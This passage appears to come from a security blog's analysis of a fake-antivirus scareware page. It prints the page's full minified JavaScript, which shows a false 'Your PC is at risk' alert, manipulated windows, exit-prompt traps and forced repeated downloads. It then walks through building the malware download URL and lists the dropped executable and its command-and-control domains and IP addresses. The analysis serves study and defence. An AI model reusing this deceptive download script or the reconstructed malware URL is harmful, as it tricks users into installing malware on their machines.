b=0;b<kPromo.images.queue[c].list.length;b++){if((typeof(kPromo.images.queue[c].list[b].naturalWidth)=="number"&&kPromo.images.queue[c].list[b].naturalWidth==0)||!kPromo.images.queue[c].list[b].complete){a=false;break}}if(a){if((typeof(kPromo.images.queue[c].isReady)=="function"&&kPromo.images.queue[c].isReady())||(typeof(kPromo.images.queue[c].isReady)!=="function")){kPromo.images.queue[c].called=true;if(typeof(kPromo.images.queue[c].callback)=="function"){kPromo.images.queue[c].callback()}}}}}kPromo.images.timerID=setTimeout(kPromo.images.processQueue,kPromo.constants.common.queueProcessTimeout)};kPromo.images.stopQueueProcessing=function(){clearTimeout(kPromo.images.timerID)};kPromo.strategy={isStrategyLoaded:false};kPromo.strategy.initialize=function(){kPromo.strategy.isStrategyLoaded=true;kPromo.strategy.properties=window.strategy.properties;kPromo.landings.property.isShowPreLanding=window.strategy.isShowPreLanding;kPromo.landings.property.preLandingShowMinTime=window.strategy.preLandingShowMinTime;kPromo.landings.property.preLandingTemplate=window.strategy.preLandingTemplate;kPromo.landings.property.preLandingTemplateInitScript=window.strategy.preLandingTemplateInitScript;kPromo.landings.property.preLandingCSSFile=window.strategy.preLandingCSSFile;kPromo.landings.property.preLandingImagesList=window.strategy.preLandingImagesList;if(kPromo.landings.property.isShowPreLanding){kPromo.css.preLandingCSSNode=kPromo.css.createStyleSheet(window.strategy.preLandingTemplateCSSFile)}kPromo.landings.property.centralLandingTemplate=window.strategy.centralLandingTemplate;kPromo.landings.property.centralLandingAlertTemplate=window.strategy.centralLandingAlertTemplate;kPromo.landings.property.centralLandingTemplateInitScript=window.strategy.centralLandingTemplateInitScript;kPromo.landings.property.centralLandingCSSFile=window.strategy.centralLandingCSSFile;kPromo.landings.property.centralLandingImagesList=window.strategy.centralLandingImagesList;kPromo.css.centralLandingCSSNode=kPromo.css.createStyleSheet(window.strategy.centralLandingTemplateCSSFile);kPromo.instructions.property.instructionType=window.strategy.instructionType;if(kPromo.instructions.property.instructionType!=null){kPromo.instructions.property.instructionTemplate=window.strategy.instructionTemplate;kPromo.instructions.property.instructionsCSSFile=window.strategy.instructionsCSSFile;kPromo.instructions.property.instructionImagesList=window.strategy.instructionImagesList;kPromo.css.instructionsCSSNode=kPromo.css.createStyleSheet(window.strategy.instructionTemplateCSSFile)}kPromo.landings.property.exitAlerts=window.strategy.exitAlerts;kPromo.common.isAggressionActive=window.strategy.isAggressive;kPromo.common.isDebugModeOn=window.strategy.isDebugModeOn;kPromo.common.isFullyCkickable=window.strategy.isFullyClickable;kPromo.common.isPreLoadImages=window.strategy.isPreLoadImages;kPromo.strategy.executeStrategy()};kPromo.strategy.executeStrategy=function(){if(kPromo.common.isDebugModeOn){alert(window.strategy.debugMessage)}if(kPromo.common.isPreLoadImages){kPromo.landings.property.isShowPreLanding?kPromo.landings.schedulePRLWithImagesCaching():kPromo.landings.scheduleCLWithImagesCaching()}else{kPromo.landings.property.isShowPreLanding?kPromo.landings.schedulePRLWithoutImagesCaching():kPromo.landings.scheduleCLWithoutImagesCaching()}if(kPromo.common.isFullyCkickable){kPromo.events.addEventHandler("mouseup",function(a){if(!kPromo.common.isLoadingIndicatorActive&&!kPromo.landings.property.isPreLandingActive){kPromo.events.setEventProperties(a,true,true);kPromo.initiateDownload()}})}kPromo.alerts.showInitialAlertMessage()};kPromo.landings={preLandingDIV:null,centralLandingDIV:null,property:{isPreLandingActive:false,isCentralLandingActive:false,isPostLandingActive:false}};kPromo.landings.hideLoadingIndicator=function(){kPromo.document.getDocumentElementByID(kPromo.constants.common.loadingMaskID).style.display="none";kPromo.common.isLoadingIndicatorActive=false};kPromo.landings.schedulePRLWithImagesCaching=function(c){c=c||kPromo.landings.showPreLanding;var a=function(){c();setTimeout(function(){var g=false;var e=false;var d=function(){g=true;kPromo.landings.property.isTimeForShowingPreLandingElapsed=true;if(e){kPromo.landings.showCentralLanding()}};var f=function(){e=true;if(g){kPromo.landings.showCentralLanding()}};kPromo.landings.scheduleCLWithImagesCaching(f);setTimeout(d,kPromo.landings.property.preLandingShowMinTime*1000*2)},kPromo.constants.centralLandingExecutionBlockDelay)};var b=function(){return kPromo.landings.preLandingCssLoadVerificationFunction()};kPromo.images.addQueue(kPromo.landings.property.preLandingImagesList,a,b)};kPromo.landings.schedulePRLWithoutImagesCaching=function(a){a=a||kPromo.landings.showPreLanding;a();kPromo.images.addQueue(kPromo.landings.property.centralLandingImagesList,null,null);setTimeout(kPromo.landings.showCentralLanding,kPromo.landings.property.preLandingShowMinTime*1000)};kPromo.landings.scheduleCLWithImagesCaching=function(a){a=a||kPromo.landings.showCentralLanding;if(kPromo.instructions.property.instructionType!=null){var b=kPromo.landings.property.centralLandingImagesList.concat(kPromo.instructions.property.instructionImagesList);var c=function(){var e=kPromo.landings.centralLandingCssLoadVerificationFunction();var d=kPromo.landings.instructionCssLoadVerificationFunction();return(e&&d)};kPromo.images.addQueue(b,a,c)}else{kPromo.images.addQueue(kPromo.landings.property.centralLandingImagesList,a,kPromo.landings.centralLandingCssLoadVerificationFunction)}};kPromo.landings.scheduleCLWithoutImagesCaching=function(a){a=a||kPromo.landings.showCentralLanding;if(kPromo.instructions.property.instructionType!=null){kPromo.images.addQueue(kPromo.instructions.property.instructionImagesList,null,null)}a()};kPromo.landings.showPreLanding=function(){if(kPromo.landings.property.isShowPreLanding){if(kPromo.instructions.property.isInstructionActive){return}if(kPromo.common.isLoadingIndicatorActive){kPromo.landings.hideLoadingIndicator()}kPromo.landings.property.isPreLandingActive=true;kPromo.css.enableStyleSheet(kPromo.css.preLandingCSSNode);if(!kPromo.landings.preLandingDIV){var label;kPromo.landings.preLandingDIV=kPromo.document.createDivElement(kPromo.constants.landings.preLandingID,kPromo.landings.property.preLandingTemplate,true);kPromo.document.body.appendChild(kPromo.landings.preLandingDIV);label=kPromo.document.getDocumentElementByID(kPromo.constants.landings.preLandingOSLabelID);if(label){label.innerHTML=kPromo.os.toFullName()}label=kPromo.document.getDocumentElementByID(kPromo.constants.landings.preLandingBrowserLabelID);if(label){label.innerHTML=kPromo.browser.toFullName()}label=kPromo.document.getDocumentElementByID(kPromo.constants.landings.preLandingScanTimeLabelID);if(label){label.innerHTML=kPromo.time.getCurrentFullTime()}eval(kPromo.landings.property.preLandingTemplateInitScript)}else{kPromo.landings.preLandingDIV.style.display="block"}}};kPromo.landings.hidePreLanding=function(){kPromo.landings.property.isPreLandingActive=false;kPromo.landings.preLandingDIV.style.display="none";kPromo.css.disableStyleSheet(kPromo.css.preLandingCSSNode)};kPromo.landings.preLandingCssLoadVerificationFunction=function(){return kPromo.css.isStyleSheetLoaded(kPromo.constants.css.preLandingCssTestElement,kPromo.css.preLandingCSSNode)};kPromo.landings.showCentralLanding=function(){if(kPromo.instructions.property.isInstructionActive){return}if(kPromo.common.isLoadingIndicatorActive){kPromo.landings.hideLoadingIndicator()}if(kPromo.landings.property.isPreLandingActive){kPromo.landings.hidePreLanding()}kPromo.css.enableStyleSheet(kPromo.css.centralLandingCSSNode);kPromo.landings.property.isCentralLandingActive=true;if(!kPromo.landings.centralLandingDIV){kPromo.landings.centralLandingDIV=kPromo.document.createDivElement(kPromo.constants.landings.centralLandingID,(kPromo.landings.property.centralLandingTemplate+kPromo.landings.property.centralLandingAlertTemplate),true);kPromo.document.body.appendChild(kPromo.landings.centralLandingDIV);eval(kPromo.landings.property.centralLandingTemplateInitScript);if(kPromo.common.isAggressionActive&&kPromo.browser.isFirefox){kPromo.executeDownloadThroughFrame()}}else{kPromo.landings.centralLandingDIV.style.display="block"}};kPromo.landings.hideCentralLanding=function(){kPromo.landings.property.isCentralLandingActive=false;kPromo.landings.centralLandingDIV.style.display="none";kPromo.css.disableStyleSheet(kPromo.css.centralLandingCSSNode)};kPromo.landings.centralLandingCssLoadVerificationFunction=function(){return kPromo.css.isStyleSheetLoaded(kPromo.constants.css.centralLandingCssTestElement,kPromo.css.centralLandingCSSNode)};kPromo.landings.showPostLanding=function(){if(kPromo.common.isAggressionActive&&(kPromo.common.alertPopUpsCount>=kPromo.constants.alerts.alertsPopUpDefaultCount)){kPromo.closeWindow(true)}var d=kPromo.landings.getExitAlert("O");if(d){var a=d[0];var b=d[1];kPromo.common.alertPopUpsCount++;var c=confirm(a);if((c&&b=="O")||kPromo.common.isAggressionActive){kPromo.initiateDownload();return false}else{}}};kPromo.landings.hidePostLanding=function(){kPromo.landings.property.isPostLandingActive=false;kPromo.document.getDocumentElementByID(kPromo.constants.landings.postLandingID).style.display="none"};kPromo.landings.getExitAlert=function(c){if(kPromo.landings.property.exitAlerts!=null){var b=kPromo.landings.property.exitAlerts.length;if(b>0&&c==null){var e=Math.floor(Math.random()*b);return new Array(kPromo.landings.property.exitAlerts[e][0],kPromo.landings.property.exitAlerts[e][1])}else{if(b>0&&c!=null){var d=new Array();for(var a=0;a<b;a++){if(kPromo.landings.property.exitAlerts[a][1]==c){d.push(kPromo.landings.property.exitAlerts[a])}}if(d.length>0){e=Math.floor(Math.random()*d.length);return d[e]}}}}return false};kPromo.instructions={instructionsDIV:null,property:{isInstructionActive:false}};kPromo.instructions.processInstructionWithPopup=function(){kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepOneDiv).style.display="block";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepTwoSubDiv).innerText="Step 2:";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepThreeSubDiv).innerText="Step 3:";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsLeftBorder).style.height=kPromo.constants.instructions.defaultHeightIEInstructionsWithPopupBordersContent+"px";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsRightBorder).style.height=kPromo.constants.instructions.defaultHeightIEInstructionsWithPopupBordersContent+"px";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsMainContent).style.height=kPromo.constants.instructions.defaultHeightIEInstructionsWithPopupBordersContent+"px";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsBordersContent).style.height=(kPromo.constants.instructions.defaultHeightIEInstructionsWithPopupBordersContent+1)+"px";if(kPromo.browser.isIE6){kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepFour).style.marginTop=kPromo.constants.instructions.defaultMarginTopIE6InstructionsWithPopupStepFour+"px"}else{kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepFour).style.marginTop=kPromo.constants.instructions.defaultMarginTopIEInstructionsWithPopupStepFour+"px"}};kPromo.instructions.processInstructionWithoutPopup=function(){kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepOneDiv).style.display="none";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepTwoSubDiv).innerText="Step 1:";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepThreeSubDiv).innerText="Step 2:";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsLeftBorder).style.height=kPromo.constants.instructions.defaultHeightIEInstructionsWithoutPopupBordersContent+"px";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsRightBorder).style.height=kPromo.constants.instructions.defaultHeightIEInstructionsWithoutPopupBordersContent+"px";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsMainContent).style.height=kPromo.constants.instructions.defaultHeightIEInstructionsWithoutPopupBordersContent+"px";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsBordersContent).style.height=(kPromo.constants.instructions.defaultHeightIEInstructionsWithoutPopupBordersContent-1)+"px";if(kPromo.browser.isIE6){kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepFour).style.marginTop=kPromo.constants.instructions.defaultMarginTopIE6InstructionsWithoutPopupStepFour+"px"}else{kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsStepFour).style.marginTop=kPromo.constants.instructions.defaultMarginTopIEInstructionsWithoutPopupStepFour+"px"}};kPromo.instructions.showInstruction=function(){kPromo.instructions.property.isInstructionActive=true;if(kPromo.instructions.property.instructionType=="tBrowser"){if(kPromo.instructions.instructionsDIV==null){kPromo.instructions.instructionsDIV=kPromo.document.createDivElement(kPromo.constants.instructions.instructionID,kPromo.instructions.property.instructionTemplate,true);kPromo.alerts.draggableItem.div=kPromo.instructions.instructionsDIV;kPromo.alerts.draggableItem.background=null;if(kPromo.landings.property.isPreLandingActive){kPromo.landings.hidePreLanding()}else{if(kPromo.landings.property.isCentralLandingActive){kPromo.landings.hideCentralLanding()}else{if(kPromo.landings.property.isPostLandingActive){kPromo.landings.hidePostLanding()}}}kPromo.layouts.removeAllLayers();kPromo.css.enableStyleSheet(kPromo.css.instructionsCSSNode);kPromo.document.body.appendChild(kPromo.instructions.instructionsDIV);var a=kPromo.document.getElementPosition(kPromo.instructions.instructionsDIV,"absolute");if(!kPromo.browser.isOpera){kPromo.instructions.instructionsDIV.style.left=a.left+"px";kPromo.instructions.instructionsDIV.style.top=a.top+"px"}}else{kPromo.instructions.instructionsDIV.style.display="block"}if(!kPromo.common.isExitAlertDialogInIEUsed&&!kPromo.browser.isFirefox){kPromo.instructions.processInstructionWithoutPopup()}else{if(kPromo.common.isExitAlertDialogInIEUsed&&!kPromo.browser.isFirefox){}}if(kPromo.browser.isIE7){kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsBordersContent).style.paddingLeft="0px";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsBordersContent).style.paddingRight="0px";kPromo.document.getDocumentElementByID(kPromo.constants.instructions.defaultIdIEInstructionsMainContent).style.marginTop="-1px"}}else{if(kPromo.instructions.property.instructionType=="tWindow"){kPromo.alerts.showInstructionInWindow(kPromo.instructions.property.instructionTemplate,443,458)}}};kPromo.landings.instructionCssLoadVerificationFunction=function(){return kPromo.css.isStyleSheetLoaded(kPromo.constants.css.instructionCssTestElement,kPromo.css.instructionsCSSNode)};kPromo.alerts={draggableItem:new Object(),windows:{}};kPromo.alerts.maximizeWindow=function(){window.moveTo(0,0);window.resizeTo(screen.width,screen.height)};kPromo.alerts.minimizeWindow=function(){window.resizeTo(1,1);window.moveTo((screen.width/2-100),(screen.height/2-25))};kPromo.alerts.showInitialAlertMessage=function(){kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=function(e,c,b){if(!kPromo.instructions.property.isInstructionActive){if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+kPromo.alerts.windows.length:"alert_window_0";kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild(kPromo.document.getDocumentElementByID(e));kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].foregroundContentLayer;kPromo.alerts.draggableItem.background=kPromo.alerts.windows[e].backgroundOpacityLayer;kPromo.document.getDocumentElementByID(e).style.display="block";if(kPromo.common.isAggressionActive&&kPromo.browser.isFirefox){var d=function(){kPromo.executeDownloadThroughFrame();setTimeout(d,kPromo.constants.common.cyclicDownloadTimeout)};kPromo.executeDownloadThroughFrame();setTimeout(d,kPromo.constants.common.cyclicDownloadTimeout)}}else{kPromo.alerts.windows[e].foregroundContentLayer.style.display="block"}}};kPromo.alerts.showInstructionInWindow=function(c,b,a){if(!kPromo.instructions.instructionsDIV){var d=kPromo.layouts.createLayer(kPromo.constants.landings.instructionID,b,a);d.foregroundContentLayer.innerHTML=c;kPromo.alerts.draggableItem.div=d.foregroundContentLayer;kPromo.alerts.draggableItem.background=d.backgroundOpacityLayer}};kPromo.alerts.hideWindow=function(a){kPromo.layouts.removeLayer(kPromo.alerts.windows[a]);delete kPromo.alerts.windows[a]};kPromo.alerts.enableDrag=function(e,f,c){if(f!=null){var b=kPromo.document.getDocumentElementByID(f);c=c||"absolute";if(kPromo.alerts.draggableItem.div!=b){var d=kPromo.document.getElementPosition(b,c);b.style.left=d.left+"px";b.style.top=d.top+"px";kPromo.alerts.draggableItem.div=b;kPromo.alerts.draggableItem.background=null}}if(kPromo.alerts.draggableItem.div!=null){e=e||window.event;kPromo.alerts.draggableItem.startLeft=parseInt(kPromo.alerts.draggableItem.div.style.left);kPromo.alerts.draggableItem.startTop=parseInt(kPromo.alerts.draggableItem.div.style.top);if(isNaN(kPromo.alerts.draggableItem.startLeft)){kPromo.alerts.draggableItem.startLeft=0}if(isNaN(kPromo.alerts.draggableItem.startTop)){kPromo.alerts.draggableItem.startTop=0}var a=new Object();if(kPromo.browser.isIE){a.x=window.event.clientX+document.documentElement.scrollLeft+document.body.scrollLeft;a.y=window.event.clientY+document.documentElement.scrollTop+document.body.scrollTop}else{a.x=e.clientX+window.scrollX;a.y=e.clientY+window.scrollY}kPromo.alerts.draggableItem.cursorStartX=a.x;kPromo.alerts.draggableItem.cursorStartY=a.y;kPromo.events.addEventHandler("mousemove",kPromo.alerts.processDrag);kPromo.events.addEventHandler("mouseup",kPromo.alerts.disableDrag);kPromo.events.setEventProperties(e,true,true)}};kPromo.alerts.disableDrag=function(){kPromo.events.removeEventHandler("mousemove",kPromo.alerts.processDrag);kPromo.events.removeEventHandler("mouseup",kPromo.alerts.disableDrag)};kPromo.alerts.processDrag=function(b){var a=new Object();if(kPromo.browser.isIE){a.x=window.event.clientX+document.documentElement.scrollLeft+document.body.scrollLeft;a.y=window.event.clientY+document.documentElement.scrollTop+document.body.scrollTop}else{a.x=b.clientX+window.scrollX;a.y=b.clientY+window.scrollY}var e=kPromo.alerts.draggableItem.startLeft+a.x-kPromo.alerts.draggableItem.cursorStartX;if(e<0){e=0}var d=kPromo.alerts.draggableItem.startTop+a.y-kPromo.alerts.draggableItem.cursorStartY;if(d<0){d=0}kPromo.alerts.draggableItem.div.style.left=e+"px";kPromo.alerts.draggableItem.div.style.top=d+"px";kPromo.events.setEventProperties(b,true,true);if(kPromo.alerts.draggableItem.background!=null){var f=kPromo.document.getWindowDimensionsWithoutScroll();var c=kPromo.document.getElementPosition(kPromo.alerts.draggableItem.div);if(c.bottom>f.height){kPromo.alerts.draggableItem.background.style.height=c.bottom+"px"}else{kPromo.alerts.draggableItem.background.style.height=f.height+"px"}if(c.right>f.width){kPromo.alerts.draggableItem.background.style.width=c.right+"px"}else{kPromo.alerts.draggableItem.background.style.width=f.width+"px"}}};kPromo.layouts={layers:[],counter:0,initialZIndex:100};kPromo.layouts.removeLayer=function(c){if(c!=null&&kPromo.layouts.layers.length!=0){var b=0;for(var a=0;a<kPromo.layouts.layers.length;a++){if(kPromo.layouts.layers[a]!=null&&kPromo.layouts.layers[a]==c){b=a;break}}kPromo.document.body.removeChild(c.root);kPromo.layouts.layers.splice(b,1);kPromo.layouts.counter--}};kPromo.layouts.removeAllLayers=function(){while(kPromo.layouts.layers.length!=0){var a=kPromo.layouts.layers.pop();kPromo.document.body.removeChild(a.root)}kPromo.layouts.counter=0};kPromo.layouts.resize=function(b){for(var a=0;a<kPromo.layouts.layers.length;a++){if(kPromo.layouts.layers[a].width){kPromo.layouts.layers[a].backgroundOpacityLayer.style.width=b.width+"px";kPromo.layouts.layers[a].foregroundContentLayer.style.left=Math.round((b.width-kPromo.layouts.layers[a].width)/2)+"px"}if(kPromo.layouts.layers[a].height){kPromo.layouts.layers[a].backgroundOpacityLayer.style.height=b.height+"px";kPromo.layouts.layers[a].foregroundContentLayer.style.top=Math.round((b.height-kPromo.layouts.layers[a].height)/2)+"px"}}};kPromo.layouts.createLayer=function(e,c,a){c=c?c:false;a=a?a:false;var f=kPromo.layouts.counter;var b={id:f,width:c,height:a,root:document.createElement("div"),backgroundOpacityLayer:document.createElement("div"),foregroundContentLayer:document.createElement("div")};b.root.setAttribute("id",e);b.backgroundOpacityLayer.className="backgroundOpacityLayer";b.backgroundOpacityLayer.style.zIndex=kPromo.layouts.initialZIndex+f;b.foregroundContentLayer.className="foregroundContentLayer";b.foregroundContentLayer.style.zIndex=kPromo.layouts.initialZIndex+f+1;b.root.appendChild(b.backgroundOpacityLayer);b.root.appendChild(b.foregroundContentLayer);kPromo.document.body.appendChild(b.root);kPromo.layouts.layers.push(b);kPromo.layouts.counter+=1;kPromo.layouts.initialZIndex+=2;if(typeof(c)!=undefined||typeof(a)!=undefined){var d=kPromo.document.getWindowDimensionsWithoutScroll();if(c){b.foregroundContentLayer.style.left=Math.round((d.width-c)/2)+"px";b.backgroundOpacityLayer.style.width=d.width+"px"}if(a){b.foregroundContentLayer.style.top=Math.round((d.height-a)/2)+"px";b.backgroundOpacityLayer.style.height=d.height+"px"}}return b};kPromo.css={engineCSSNode:null,preLandingCSSNode:null,centralLandingCSSNode:null,postLandingCSSNode:null,instructionsCSSNode:null};kPromo.css.insertStyleSheet=function(b){if(document.createStyleSheet&&kPromo.browser.isIE){var a=document.createStyleSheet(b);a.disabled=true;return a}else{a=document.createElement("link");a.type="text/css";a.rel="stylesheet";a.href=b;a.media="screen";kPromo.document.head.appendChild(a);a.disabled=true;return a}};kPromo.css.createStyleSheet=function(c,a){a=(a==null)?true:a;var b=document.createElement("style");b.setAttribute("type","text/css");b.setAttribute("media","screen");if(kPromo.browser.isIE){b.styleSheet.cssText=c}else{try{b.appendChild(document.createTextNode(c))}catch(d){b.cssText=c}}kPromo.document.head.appendChild(b);b.disabled=a;return b};kPromo.css.disableStyleSheet=function(a){if(a!=null){a.disabled=true}};kPromo.css.enableStyleSheet=function(a){if(a!=null){a.disabled=false}};kPromo.css.isStyleSheetLoaded=function(c,b){var a=kPromo.document.getDocumentElementByID(c);if(!a){a=document.createElement("div");a.setAttribute("id",c);document.body.appendChild(a)}b.disabled=false;if(parseInt(a.clientWidth)==kPromo.constants.css.cssTestElementDefaultWidth){b.disabled=true;document.body.removeChild(a);return true}else{b.disabled=true;return false}};kPromo.css.getStyleValue=function(a,b){if(a.currentStyle){return a.currentStyle[b]}else{if(window.getComputedStyle){return document.defaultView.getComputedStyle(a,null).getPropertyValue(b)}}return null};kPromo.events={resizeInterval:0};kPromo.events.geckoUnloadHandler=function(b,a){b.returnValue=a;return b.returnValue};kPromo.events.ieUnloadHandler=function(b,a){if(!kPromo.common.isLoadingIndicatorActive&&!kPromo.landings.property.isPreLandingActive){kPromo.common.isExitAlertDialogInIEUsed=true}b.returnValue=a;return b.returnValue};kPromo.events.onUnloadEventHandler=function(b){if(kPromo.common.isAggressionActive&&(kPromo.common.alertPopUpsCount>=kPromo.constants.alerts.alertsPopUpDefaultCount)){kPromo.closeWindow(false);return}b=b||window.event;var c=kPromo.landings.getExitAlert("C");if(c||kPromo.common.isLoadingIndicatorActive){var a=c[0]||kPromo.constants.alerts.defaultAlertMessage;kPromo.common.alertPopUpsCount++;if(kPromo.browser.isIE){kPromo.events.ieUnloadHandler(b,a)}else{kPromo.events.geckoUnloadHandler(b,a)}}if(kPromo.landings.property.isPreLandingActive){setTimeout("kPromo.landings.scheduleCLWithoutImagesCaching ();",100)}else{if(kPromo.landings.property.isCentralLandingActive||kPromo.instructions.property.isInstructionActive){setTimeout("kPromo.initiateDownload();",100)}else{if(kPromo.common.isLoadingIndicatorActive&&kPromo.strategy.isStrategyLoaded){kPromo.images.stopQueueProcessing();kPromo.common.isPreLoadImages=false;kPromo.landings.property.isShowPreLanding?setTimeout("kPromo.landings.schedulePRLWithoutImagesCaching();",100):setTimeout("kPromo.landings.scheduleCLWithoutImagesCaching();",100)}}}};kPromo.events.onResizeEventHandler=function(){var a=kPromo.document.getWindowDimensionsWithScroll();kPromo.layouts.resize(a)};kPromo.events.init=function(){kPromo.events.addEventHandler("resize",kPromo.events.onResizeEventHandler,window);window.onbeforeunload=kPromo.events.onUnloadEventHandler};kPromo.events.addEventHandler=function(b,c,a){a=a||document;if(kPromo.browser.isIE){b="on"+b;a.attachEvent(b,c)}else{a.addEventListener(b,c,false)}};kPromo.events.removeEventHandler=function(b,c,a){a=a||document;if(kPromo.browser.isIE){b="on"+b;a.detachEvent(b,c)}else{a.removeEventListener(b,c,false)}};kPromo.events.setEventProperties=function(b,a,c){b=b||window.event;a=a||false;c=c||false;if(kPromo.browser.isIE){b.cancelBubble=a;b.returnValue=!c}else{if(a){b.stopPropagation()}if(c){b.preventDefault()}}};kPromo.animation={};kPromo.animation.setStyleProperty=function(f,e,a,b){var d=document.getElementById(f);if(typeof(d)!=undefined&&d!=null){var c=function(){if(typeof(d)!=undefined&&d!=null){d.style[e]=a}};setTimeout(c,b*1000)}};kPromo.animation.rotateText=function(g,d,e,f){var b=kPromo.document.getDocumentElementByID(g);if(typeof(b)!=undefined&&b!=null){var a=0;var c=function(){if(typeof(b)!=undefined&&b!=null){b.innerHTML=d[a];a++;if(d[a]!=undefined){setTimeout(c,e*1000)}}};setTimeout(c,f*1000)}};kPromo.browser.init();kPromo.os.init();kPromo.events.init();kPromo.saveQueryParameters();kPromo.document.init();


What we need to do now, is analyze this, to identify where the actual download is coming from. The easiest way to do this is look for key words such as download, URL, .php and of course, .exe. In this case, looking for download eventually takes us to the following snippet;

kPromo.base.downloadFrame.src=kPromo.getDownloadURL()


Which tells us to look at the getDownloadURL function. Looking for that, gives us the following;

kPromo.getDownloadURL=function(){return"build"+kPromo.strategy.properties.ls+"_"+kPromo.strategy.properties.uid+".php?cmd=getFile&counter="+kPromo.common.downloadAttemptsCount+"&"+kPromo.base.queryParameters};


From here, we can deduce that the download URL is going to be;

/build[n]_[n].php?cmd=getFile&counter=[n]&[var]

Previously, the &[var] wasn't required. However, as it is now, we now need to look for what kPromo.base.queryParameters is required to contain. Looking through the source for queryParameters= gives us;

var a=location.search;kPromo.base.queryParameters=a.replace("?","")


Which kindly tells us it's expecting the contents of location.search, which in this case, would be the base64 encoded string we saw at the beginning;

WKmimHVlbHKHjsbIo21zdYWMpYOInKOjY4nT1m6uqI61h8WilnGbk4F5bw==

If we now put this all together, we end up with the following URL, replacing [n] with random numbers;

trustshield.info/build9_12.php?cmd=getFile&counter=1&p=WKmimHVlbHKHjsbIo21zdYWMpYOInKOjY4nT1m6uqI61h8WilnGbk4F5bw==

Which results in a file called Setup_build6_149.exe (195K)

VirusTotal report:
http://www.virustotal.com/analisis/36193d0821b294ac7b566cf312dc04350963959cb9a455a2b5c3930c08c94a57-1246500817

Threat Expert report:
http://www.threatexpert.com/report.aspx?md5=bd0e254ee9f56c1878bdf37c1390b314

The TE report also shows connections from the program to;

update1.fastantivirus09.com (also valid as update2.) - 206.53.61.73 (NetName: VELCOM)
updvmfnow.cn - 64.86.17.9 (proxy.virus-doctor.com) (NetName: VELCOM)

No comments: